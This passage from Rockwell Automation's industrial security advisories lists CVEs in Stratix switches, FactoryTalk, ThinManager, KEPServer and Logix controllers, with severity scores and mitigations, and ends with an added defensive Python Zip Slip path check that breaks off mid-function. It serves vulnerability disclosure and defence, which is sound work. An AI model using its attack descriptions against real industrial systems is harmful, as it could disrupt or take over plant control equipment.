CVE-2021-1385 - Cisco IOx Application Environment Path Traversal Vulnerability
CVSS Base Score 6.5/10 (Medium)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

A vulnerability in the Cisco IOx application hosting environment of multiple Cisco platforms could allow an authenticated, remote attacker to conduct directory traversal attacks and read and write files on the underlying operating system or host system.

CVE-2020-3516 - Cisco IOS XE Software Web UI Improper Input Validation Vulnerability
CVSS Base Score 4.3/10 (Medium)
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

A vulnerability in the web server authentication of Cisco IOS XE Software could allow an authenticated, remote attacker to crash the web server on the device.

Risk Mitigation & User Action

This vulnerability has been addressed in newer versions of the Stratix 5800 switch. Customers are also directed towards the risk mitigations provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Products Affected / Vulnerabilities / Suggested Actions
Stratix 5800 switches: CVE-2020-3209, CVE-2020-3211, CVE-2020-3218, CVE-2020-3229, CVE-2020-3219, CVE-2020-3516, CVE-2021-1385, CVE-2021-1446. Update to Stratix 5800 v.17.04.01 or later.
Stratix 5800 switches: CVE-2020-3200. Update to v16.12.01 or later.
Stratix 5400/5410 switches: CVE-2020-3200. Update to v15.2(7)E2 or later.

Additionally, please see our Knowledgebase article, QA43240 - Recommended Security Guidelines from Rockwell Automation, for additional recommendations to maintain the security posture of your environment.

References

  • Cisco IOS XE Software Web UI Privilege Escalation Vulnerability
  • Cisco IOS XE Software Web UI Command Injection Vulnerability
  • Cisco IOS XE Software DNS NAT Protocol Application Layer Gateway Denial-of-Service Vulnerability
  • Cisco IOS and IOS XE Software Secure Shell Denial of Service Vulnerability
  • Cisco IOS XE Software Web UI Command Injection Vulnerability
  • Cisco IOS XE Software Web UI Remote Code Execution Vulnerability
  • Cisco IOS XE Software Digital Signature Verification Bypass Vulnerability
  • Cisco IOx Application Environment Path Traversal Vulnerability
  • Cisco IOS XE Software Web UI Improper Input Validation Vulnerability

High
PN1605 | FactoryTalk Alarm and Events Server Vulnerable to Denial-Of-Service Attack
Published Date:
October 27, 2022
Last Updated:
October 16, 2024
CVE IDs:
CVE-2022-38744
Products:
FactoryTalk View SE, Studio 5000 View Designer
CVSS Scores (v3.1):
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes

 

Revision History
Version 1.0 – October 27, 2022

Executive Summary

Rockwell Automation received a report from Kaspersky Labs regarding one vulnerability in FactoryTalk® Alarms and Events servers. If successfully exploited, this vulnerability may result in a denial-of-service condition causing the server to be unavailable.

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them appropriately to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided.

Affected Products

FactoryTalk Alarms and Events server – All versions

Vulnerability Details

CVE-2022-38744 FactoryTalk Alarm and Events server vulnerable to denial-of-service attack
An unauthenticated attacker with network access to a victim's FactoryTalk service could open a connection, causing the service to fault and become unavailable. The affected port can be used as a server ping port and uses messages structured with XML.

CVSS v3.1 Base Score: 7.5/10[MEDIUM]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected software are encouraged to set up the secondary mitigation as described below that addresses the associated risk. Customers are also directed towards general risk mitigation strategies provided in QA43240 - Recommended Security Guidelines from Rockwell Automation , in our Knowledgebase.
Vulnerability Suggested Actions
CVE-2022-38744: Customers should set up IPsec to mitigate this issue as detailed in QA46277 - Deploying FactoryTalk Software with IPsec.

General Security Guidelines

General security guidelines can be found in QA43240 - Recommended Security Guidelines from Rockwell Automation .

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

  • PN1354 - Industrial Security Advisory Index
  • CVE-2022-38744 JSON

 

Critical
PN1606 | PN1606 | Factory Talk VantagePoint Software Broken Access Control and Input Validation Vulnerability
Published Date:
October 07, 2022
Last Updated:
October 07, 2022
CVE IDs:
CVE-2022-3158, CVE-2022-38743
Products:
FactoryTalk Linx OPC UA Connector
CVSS Scores:
9.9
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision Number
1.0
Revision History
Version 1.0 – October 06, 2022

Executive Summary

Rockwell Automation is aware of a broken access control and input validation vulnerability. If exploited, this vulnerability could potentially lead to a high impact on the confidentiality and a low impact on the integrity and availability of FactoryTalk® VantagePoint® software.

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

FactoryTalk VantagePoint software v. 8.0, 8.10, 8.20, 8.30, 8.31

Vulnerability Details

CVE-2022-38743 FactoryTalk VantagePoint Software Broken Access Control Vulnerability
As a part of our commitment to security, Rockwell Automation performs routine testing and vulnerability scanning to maintain the security posture of products. During penetration testing, we discovered a broken access control vulnerability. The FactoryTalk VantagePoint SQLServer account could allow a malicious user with read-only privileges to execute SQL statements in the back-end database.

CVE-2022-38743
CVSS Base Score: 9.9/10 (Critical)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE-2022-3158 FactoryTalk VantagePoint Software Input Validation Vulnerability
Additionally, the software lacks input validation when users enter SQL statements to retrieve information from the back-end database. This vulnerability could potentially allow a user with basic user privileges to perform remote code execution on the server.

CVE-2022-3158
CVSS Base Score: 9.9/10 (Critical)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are encouraged to apply the following configurable risk mitigations to help reduce the risk associated with this vulnerability. We also recommend customers combine risk mitigations with security best practices to employ a defense in depth approach.
Mitigation A: Update to FactoryTalk VantagePoint V8.00/8.10/8.20/8.30/8.31 or later, using BF28452 - Patch: Multiple issues, FactoryTalk VantagePoint 8.00/8.10/8.20/8.30/8.31.
Mitigation B: If customers are unable to update, we suggest customers configure the database to follow the least privilege principle.

Additional Links

  • CVE-2022-38743
  • CVE-2022-3158

High
PN1595 | PN1595 | OpenSSL Infinite Loop in Rockwell Automation Products
Published Date:
September 23, 2022
Last Updated:
January 28, 2025
CVE IDs:
CVE-2022-0778
CVSS Scores:
7.5, 4.9
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

 

Revision History
Version 1.2 - 28-Jan-2025, Updated Impacted Products (Stratix 4300)
Version 1.1 – 8-Sept-2022, Updated Suggested Actions

Executive Summary

Rockwell Automation received a report on a new vulnerability within OpenSSL, which is used within some of our products. This vulnerability can lead to a denial-of-service within the affected products if successfully launched by an attacker.

Customers using affected versions of this software are encouraged to evaluate the following mitigations provided and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided in this security advisory.

Affected Products

  • ThinManager® software (Versions 12.0.0 - 12.0.2, 12.1.0 - 12.1.3)
  • FactoryTalk® Linx Gateway (Version 6.30 and earlier)
  • Factory Talk Linx OPC UA Connector (Version 6.30 and earlier)
  • Factory Talk View (Version 11.00 - Version 13.00)
  • Stratix 4300 (Versions 4.0.1.117 and earlier)

Vulnerability Details

CVE-2022-0778 OpenSSL allows for an infinite loop

This vulnerability causes the OpenSSL library to enter an infinite loop when parsing an invalid certificate and can result in a denial-of-service (DoS) to the application. An attacker does not need a verified certificate to exploit this vulnerability because parsing a bad certificate triggers the infinite loop before the verification process is completed.

CVSS v3.1 Base Score: 7.5/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2022-0778 OpenSSL allows for an infinite loop (*This CVE score only applies to ThinManager)

This vulnerability causes the OpenSSL library to enter an infinite loop when parsing an invalid certificate and can result in a denial-of-service (DoS) to the application. An attacker does not need a verified certificate to exploit this vulnerability because parsing a bad certificate triggers the infinite loop before the verification process is completed.

Administrator privileges are needed for this attack to be successful on ThinManager Software.

CVSS v3.1 Base Score: 4.9/10[MEDIUM]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Products Affected / Suggested Actions

ThinManager: This issue has been patched. Customers should follow the patch instructions as follows:
If using v12.0.0-12.0.2 >> Download v12.0.3
If using v12.1.0-12.1.3 >> Download v12.1.4

Factory Talk Linx Gateway: Customers should view BF28103 - Patch: OpenSSL Vulnerability, OPC UA Connector 6.20, 6.21, 6.30 to install the update that mitigates the issue.

Factory Talk Linx OPC UA Connector: Customers should view BF28103 - Patch: OpenSSL Vulnerability, OPC UA Connector 6.20, 6.21, 6.30 to install the update that mitigates the issue.

Factory Talk View: Customers should view BF28297 - Patch: Open SSL Vulnerability, FactoryTalk View 11.0, 12.0, 13.0 to install the update that mitigates the issue.

Stratix 4300: The issue has been patched. Customers should upgrade to v4.0.2.101 (Download Center).

If an upgrade is not possible or available, customers should consider implementing the following mitigations:
  • Use of Microsoft® AppLocker or other similar allow list applications can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, see Knowledgebase Article PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as connected devices.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation, and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Additional Links

  • PN1354 - Industrial Security Advisory Index
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide


High
PN1604 | ThinManager Software Vulnerable to Arbitrary Code Execution and Denial-Of-Service Attack
Published Date:
September 22, 2022
Last Updated:
September 22, 2022
CVE IDs:
CVE-2022-38742
Products:
ThinManager
CVSS Scores:
8.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 – September 22, 2022 – Initial Version

Executive Summary

A vulnerability was discovered by rgod working with Trend Micro’s Zero Day Initiative and reported to Rockwell Automation.  The vulnerability was discovered in the ThinManager® ThinServer™ software. Successful exploitation of this vulnerability could allow an attacker to make the software unresponsive or execute arbitrary code.

Customers using the products in scope are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerabilities, including recommended countermeasures, are listed below.

Affected Products

ThinManager ThinServer software Versions
11.0.0 – 11.0.4
11.1.0 – 11.1.4
11.2.0 – 11.2.5
12.0.0 – 12.0.2
12.1.0 – 12.1.3
13.0.0

Vulnerability Details

CVE-2022-38742 ThinManager ThinServer Heap-Based Overflow

CVSS Base Score: 8.1/10 (High)
CVSS 3.1 Vector String: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

In affected versions, an attacker can send a specifically crafted TFTP or HTTPS request causing a heap-based buffer overflow that crashes the ThinServer process.  This potentially exposes the server to arbitrary remote code execution.

Risk Mitigation & User Action

Customers are directed towards the risk mitigations provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
CVE-2022-38742 – Versions Affected / Suggested Actions
  • 11.0.0 – 11.0.4: Update to v11.00.05
  • 11.1.0 – 11.1.4: Update to v11.01.05
  • 11.2.0 – 11.2.5: Update to v11.02.06
  • 12.0.0 – 12.0.2: Update to v12.00.03
  • 12.1.0 – 12.1.3: Update to v12.01.04
  • 13.0.0: Update to v13.00.01

Additional Mitigations

If users are unable to update to the patched version, they should put the following mitigation in place:
  • Block network access to the ThinManager TFTP and HTTPS ports from endpoints other than ThinManager managed thin clients
For additional security best practices, please see our Knowledgebase article, QA43240 - Security Best Practices, to maintain the security posture of your environment.

References

CVE-2022-38742

Critical
PN1603 | KEPServer Enterprise Vulnerable to Remote Code Execution and Denial-of-Service Attack
Published Date:
September 01, 2022
Last Updated:
September 01, 2022
CVE IDs:
CVE-2022-2825, CVE-2022-2848
Products:
KEPServer Enterprise
CVSS Scores:
9.1, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 – September 1, 2022 – Initial Version

Executive Summary

Rockwell Automation was notified by ICS-CERT of vulnerabilities discovered in Kepware® KEPServerEX, which affects the Rockwell Automation KEPServer Enterprise. Successful exploitation of these vulnerabilities could allow an attacker to crash the device or remotely execute arbitrary code.

Customers using the products in scope are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details are provided relating to the discovered vulnerabilities, including recommended countermeasures.

Affected Products

KEPServer Enterprise – All versions prior to v13.01.00

Vulnerability Details

CVE-2022-2848 KEPServer Enterprise Heap-Based Overflow
CVSS Base Score: 9.1/10 (Critical)
CVSS 3.1 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Specifically crafted OPC UA messages transmitted to the server could allow an attacker to crash the server and leak data.

CVE-2022-2825 KEPServer Enterprise Stack-Based Overflow
CVSS Base Score: 9.8/10 (Critical)
CVSS 3.1 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Specifically crafted OPC UA messages transmitted to the server could allow an attacker to crash the server and remotely execute code.

Risk Mitigation & User Action

Vulnerability / Suggested Actions
  • CVE-2022-2848, CVE-2022-2825: Customers should update to version 13.01.00, which mitigates these issues.

If a customer is unable to update to the mitigated version, it is suggested that Security Best Practices are followed as outlined in our Knowledgebase article, QA43240 - Security Best Practices.

General Security Guidelines

References

CVE-2022-2848
CVE-2022-2825
ICSA-22-242-10 Advisory

Medium
PN1598 | CVE-2022-1096 Chromium Type Confusion Vulnerability Impacts Multiple Products
Published Date:
August 26, 2022
Last Updated:
August 26, 2022
CVE IDs:
CVE-2022-1096
Products:
Using CCW with PanelView Component Terminals, FactoryTalk Linx Gateway, FactoryTalk View SE, Installing CCW, FactoryTalk Linx / RSLinx Enterprise, PowerFlex 6000, Using CCW with Micro800 Controllers, Using CCW with Component Class Drives
CVSS Scores:
4.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Reference: CVE-2022-1096
Revision Number: 1.1
Revision History
Version 1.0 – July 12, 2022
Version 1.1 – August 26, 2022 – Updated FT View Site Edition Mitigation Instructions

Executive Summary

Rockwell Automation is aware of multiple products that use the Chromium web browser and are affected by CVE-2022-1096, a zero-day type confusion vulnerability. Exploitation of this vulnerability could potentially lead to a low impact to the availability of the targeted device. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Customers using the products in scope are encouraged to evaluate the following mitigations and apply them appropriately to their deployed products. Additional details relating to the discovered vulnerabilities, including recommended countermeasures, are provided.

Affected Products

Product in Scope / Vulnerable Component

FactoryTalk® Linx Enterprise software v6.20, 6.21, and 6.30
  • v6.21: CefSharp v73.1.130 (EIPCACT feature)
  • v6.30: CefSharp v91.1.230 (EIPCACT feature)
  • v6.20: CefSharp v73.1.130 (Device Config feature)
  • v6.21: CefSharp v73.1.130 (Device Config feature)
  • v6.30: CefSharp v73.1.130 (Device Config feature)

Enhanced HIM (eHIM) for PowerFlex® 6000T drives v1.001
  • Electron v4.2.12

Connected Components Workbench™ software v11, 12, 13 & 20
  • Note: Drives Trending 1.00.00 and 2.00.00 use Connected Components Workbench CefSharp v81.3.100

FactoryTalk Linx Gateway software v6.21 and v6.30
  • v6.21: CefSharp v73.1.130
  • v6.30: CefSharp v91.1.230

FactoryTalk View Site Edition software v13.0
  • WebView2 v96.0.1054.43

Vulnerability Details

Rockwell Automation has been made aware of a third-party vulnerability that is present in multiple vendor components, which our products use. Due to the way Rockwell Automation uses the Chromium web browser, exploitation of this vulnerability may cause the vulnerable products to become unavailable temporarily. As a result, we adjusted the CVSS Score to reflect how this vulnerability affects our products.

CVE-2022-1096 Chromium Web Browser Type Confusion Vulnerability
CVSS Base Score: 4.0/10 (Medium)
CVSS 3.1 Vector String: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Risk Mitigation & User Action

Rockwell Automation is in the process of testing and validating the patch and will update this advisory for each product as updated firmware becomes available.

For customers using FactoryTalk View Site Edition, follow the recommended actions to address the vulnerability:
  • Do not use the FactoryTalk View SE web browser control if it is not required for the intended use of the product.
  • Customers utilizing the SE Web Browser can manually download and apply the newer version of WebView2 by using the following directions:
    • Replace the Microsoft® msedgewebview2.exe file that is saved in C:\Program Files (x86)\Rockwell Software\RSView Enterprise\Microsoft.WebView2.FixedVersionRuntime by copying and pasting the new version of the software into the folder.
    • DO NOT remove the contents of the folder before pasting the new file.

For customers using the Enhanced HIM (eHIM) for PowerFlex 6000T drives, follow the recommended actions to address the vulnerability:
  • Update the Microsoft Edge browser to Version 99.0.1150 or later. Additionally, apply the update for eHIM when it becomes available to mitigate the vulnerability.
If applying the mitigations noted above is not possible, please see our Knowledgebase article, QA43240 - Security Best Practices, for additional recommendations to maintain the security posture of your environment.

References

  • CVE-2022-1096 - Security Update Guide - Microsoft - Chromium: CVE-2022-1096 Type Confusion in V8
  • ICSA-22-209-01 Advisory

Critical
PN1550 | CVE-2021-22681: Authentication Bypass Vulnerability Found in Logix Controllers
Published Date:
July 20, 2022
Last Updated:
July 20, 2022
CVE IDs:
CVE-2021-22681
Products:
SoftLogix5800, 1794 FlexLogix, 1756 ControlLogix, 1769 CompactLogix Controllers, 1769 Compact GuardLogix 5370, 1768 CompactLogix Controllers, 5069 Compact GuardLogix 5380, RSLogix 5000 / Studio 5000 Logix Designer
CVSS Scores:
10.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision Number: 1.4
Revision History
Version 1.0 - February 25, 2021. Initial Release.
Version 1.2 - March 5, 2021. Updated for clarity.
Version 1.3 - May 5, 2021. Mitigations updated – 1783-CSP CIP Security Proxy.
Version 1.4 - July 20, 2022. Rearranged placement of general mitigations.

Executive Summary

Researchers found that our Studio 5000 Logix Designer® software may allow a key to be discovered. This key is used to verify Logix controllers are communicating with Rockwell Automation design software. If successfully exploited, this vulnerability could allow an unauthorized application to connect with Logix controllers. To leverage this vulnerability, an unauthorized user would require network access to the controller.

FactoryTalk® Security provides user authentication and authorization for a particular set of actions within RSLogix® 5000 and Studio 5000®. Once the application is authorized to open and connect to the controller within RSLogix 5000 or Studio 5000, the verification mechanism referenced above is leveraged to establish the connection to the controller. For customers concerned with user access control who have deployed FactoryTalk Security, this vulnerability may allow an attacker to bypass the protections provided by FactoryTalk Security.

This vulnerability was independently co-discovered by Lab of Information Systems Security Assurance (Eunseon Jeong, Youngho An, Junyoung Park, Insu Oh, Kangbin Yim) of Soonchunhyang University, Kaspersky, and by Claroty, a cybersecurity technology vendor and partner of Rockwell Automation.

Affected Products

Software:
RSLogix 5000 software v16-20, Studio 5000 Logix Designer v21 and later, and corresponding Logix controllers running these versions.
FactoryTalk Security, part of the FactoryTalk Services Platform, if configured and deployed v2.10 and later.

Controllers:
1768 CompactLogix™
1769 CompactLogix
CompactLogix 5370
CompactLogix 5380
CompactLogix 5480
ControlLogix 5550
ControlLogix® 5560
ControlLogix 5570
ControlLogix 5580
DriveLogix™ 5730
FlexLogix™ 1794-L34
Compact GuardLogix® 5370
Compact GuardLogix 5380
GuardLogix 5560
GuardLogix 5570
GuardLogix 5580
SoftLogix™ 5800

Vulnerability Details

CVE-2021-22681: Private Key Extraction
Studio 5000 Logix Designer uses a key to verify Logix controllers are communicating with Rockwell Automation products. If successfully exploited, this vulnerability could allow a remote, unauthenticated attacker to bypass a verification mechanism and authenticate with Logix controllers. If exploited, this vulnerability could enable an unauthorized third-party tool to make changes to the controller configuration and/or application code.

CVSS v3.1 Base Score: 10.0/CRITICAL
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

For details and further mitigation options, please see the table below.

Product Family and Version / Risk Mitigation and Recommended User Actions

ControlLogix 5580 v32 or later
  • Put the controller mode switch to “Run” mode.
If the above cannot be deployed, the following mitigations are recommended:
  • Deploy CIP Security for Logix Designer application connections through the front port. CIP Security prevents unauthorized connections when deployed properly.
  • If not using the front port, use a 1756-EN4TR ControlLogix EtherNet/IP™ module and deploy CIP Security. The 1756-EN4TR supports CIP Security, which prevents unauthorized connections when properly deployed.

ControlLogix 5580 v31
  • Put the controller mode switch to “Run” mode.
If the above cannot be deployed, the following mitigations are recommended:
  • Apply v32 or later and follow the mitigation actions outlined above.
  • If unable to apply a newer version, use a 1756-EN4TR ControlLogix EtherNet/IP module and deploy CIP Security. The 1756-EN4TR supports CIP Security, which helps prevent unauthorized connections when properly deployed.

ControlLogix 5570 v31 or later
  • Put the controller mode switch to “Run” mode.
If the above cannot be deployed, the following mitigation is recommended:
  • Use a 1756-EN4TR ControlLogix EtherNet/IP module and deploy CIP Security. The 1756-EN4TR supports CIP Security, which helps prevent unauthorized connections when properly deployed.

CompactLogix 5380 v28 or later
  • Put the controller mode switch to “Run” mode.
If the above cannot be deployed, the following mitigation is recommended:
  • Install the 1783-CSP CIP Security Proxy to provide a secure connection between the engineering workstation and the controller. For more information, please see the 1783-CSP CIP Proxy User Manual.

CompactLogix 5370 v20 or later
  • Put the controller mode switch to “Run” mode.
If the above cannot be deployed, the following mitigation is recommended:
  • Install the 1783-CSP CIP Security Proxy to provide a secure connection between the engineering workstation and the controller. For more information, please see the 1783-CSP CIP Proxy User Manual.

ControlLogix 5580 v28-v30
ControlLogix 5570 v18 or later
ControlLogix 5560 v16 or later
ControlLogix 5550 v16
GuardLogix 5580 v31 or later
GuardLogix 5570 v20 or later
GuardLogix 5560 v16 or later
1768 CompactLogix v16 or later
1769 CompactLogix v16 or later
CompactLogix 5480 v32 or later
Compact GuardLogix 5370 v28 or later
Compact GuardLogix 5380 v31 or later
FlexLogix 1794-L34 v16
DriveLogix 5370 v16 or later
  • Put the controller mode switch to “Run” mode.

SoftLogix 5800
  • No additional mitigation available. Follow the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide.

Detection Strategies:
In addition, customers can continue to use the methods below to detect changes to configuration or application files:
  • Monitor controller change log for any unexpected modifications or anomalous activity.
  • If using v17 or later, utilize the Controller Log feature.
  • If using v20 or later, utilize Change Detection in the Logix Designer Application.
  • If available, use the functionality in FactoryTalk® AssetCentre software to detect changes.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Consult the product documentation for specific features, such as a hardware Mode Switch setting, which may be used to block unauthorized changes, etc.
Social Engineering Mitigation Strategies
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
General Mitigations

Customers using the affected products are directed towards risk mitigation and are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense-in-depth strategy.

Rockwell Automation has determined that this vulnerability cannot be mitigated with a patch. Rockwell Automation encourages customers to implement the mitigation strategies outlined in this disclosure.

A comprehensive defense-in-depth strategy can reduce the risk of this vulnerability. To leverage this vulnerability, an unauthorized user requires network access to the controller. Customers should confirm that they are employing proper network segmentation and security controls, including, but not limited to:
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the enterprise/business network.
  • Restrict or block traffic on TCP 44818 from outside of the industrial control system network zone. For more information on the TCP/UDP ports used by Rockwell Automation products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. A VPN is only as secure as the connected devices.
Customers can refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide (Publication ENET-TD001E) for best practices for deploying network segmentation and broader defense in depth strategies. Customers can also refer to the Rockwell Automation System Security Design Guidelines (Publication secure-rm001) on how to use Rockwell Automation products to improve the security of their industrial automation systems.

CIP Security mitigates this vulnerability as it provides the ability to deploy TLS- and DTLS-based secure communications to supported products. CIP Security is an enhancement to the ODVA EtherNet/IP industrial communication standard and directly addresses the vulnerability noted in this disclosure. CIP Security allows users to leverage and manage certificates and/or pre-shared keys and does not make use of any hardcoded keys.

As of May 5, 2021, a new mitigation option is available. The 1783-CSP CIP Security Proxy is a standalone hardware solution that provides CIP Security for devices that do not natively support CIP Security. See the mitigation table above for how this product can be deployed to address CompactLogix-based applications.

Customers requiring setup or deployment guidance for the CIP Security protocol should refer to the CIP Security deployment reference guide (Publication secure-at001) for more information.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

Additional Links
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • ICSA-21-056-03

High
PN1600 | ISaGRAF Workbench Vulnerable to Multiple Phishing-Style Attacks
Published Date:
July 20, 2022
Last Updated:
July 20, 2022
CVE IDs:
CVE-2022-2463, CVE-2022-2465, CVE-2022-2464
Products:
AADvance, ISaGRAF, Trusted
CVSS Scores:
6.1, 7.7, 8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 – July 19, 2022
Version 1.1 – July 20, 2022 – Added AADvance-Trusted SIS Workstation to products affected

Executive Summary

Rockwell Automation received a report from Claroty regarding three vulnerabilities in ISaGRAF® Workbench. If successfully exploited, these vulnerabilities may result in directory traversal, privilege escalation, and arbitrary code execution. These vulnerabilities all require user interaction such as a phishing attack for successful exploitation.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

  • ISaGRAF Workbench v6.0 through v6.6.9
  • AADvance-Trusted Safety Instrumented System Workstation v1.1 and below

Vulnerability Details

CVE-2022-2465: Deserialization of untrusted data may result in arbitrary code execution

ISaGRAF Workbench does not limit the objects that can be deserialized. This vulnerability allows attackers to craft a malicious serialized object that, if opened by a local user in ISaGRAF Workbench, may result in remote code execution. This vulnerability requires user interaction to be successfully exploited.

CVSS v3.1 Base Score: 8.6/10 (High)
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE-2022-2464: Directory traversal vulnerability may lead to privilege escalation

The parsing mechanism that processes certain file types does not provide input sanitization for file paths. This may allow an attacker to craft malicious files that, when opened by ISaGRAF Workbench, can traverse the file system. If successfully exploited, an attacker would be able to overwrite existing files and create additional files with the same permissions as the ISaGRAF Workbench software. User interaction is required for this exploit to be successful.

CVSS v3.1 Base Score: 7.7/10 (High)
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE-2022-2463: Improper input sanitization may lead to privilege escalation

ISaGRAF does not sanitize paths specified within the .7z exchange file during extraction. This type of vulnerability is also commonly referred to as a Zip Slip. A local, authenticated attacker can create a malicious .7z exchange file that when opened by ISaGRAF Workbench will allow the attacker to gain the privileges of the software. If the software is running at SYSTEM level, the attacker will gain admin level privileges. User interaction is required for this exploit to be successful.

CVSS v3.1 Base Score: 6.1/10 (Medium)
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
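An added example, not ISaGRAF or Rockwell Automation code, of the path check whose absence the Zip Slip description above refers to: every entry name is normalized and rejected if it is absolute or climbs out of the extraction root. It is shown on an in-memory ZIP rather than a .7z file, since Python's standard library reads only ZIP, and all entry names are constructed test inputs.

```python
"""Zip Slip guard: refuse archive entries whose paths escape the extraction root.

Added example, not ISaGRAF or Rockwell Automation code. The advisory describes
unsanitised paths inside a .7z exchange file; the check is format-agnostic and is
demonstrated on an in-memory ZIP, since the standard library has no 7z reader.
Every entry name below is a constructed test input.
"""
from __future__ import annotations

import io
import re
import tempfile
import zipfile
from pathlib import Path

# Drive letters and UNC prefixes are absolute even without a leading slash.
_DRIVE_OR_UNC = re.compile(r"^([A-Za-z]:|\\\\|//)")


def normalize_member(name: str) -> list[str] | None:
    """Return the relative path components of an entry, or None if it is unsafe.

    Rejects absolute paths and any '..' that would climb above the root. Both '/'
    and '\\' are treated as separators, since the producer may be a Windows tool.
    """
    if not name or _DRIVE_OR_UNC.match(name):
        return None
    unified = name.replace("\\", "/")
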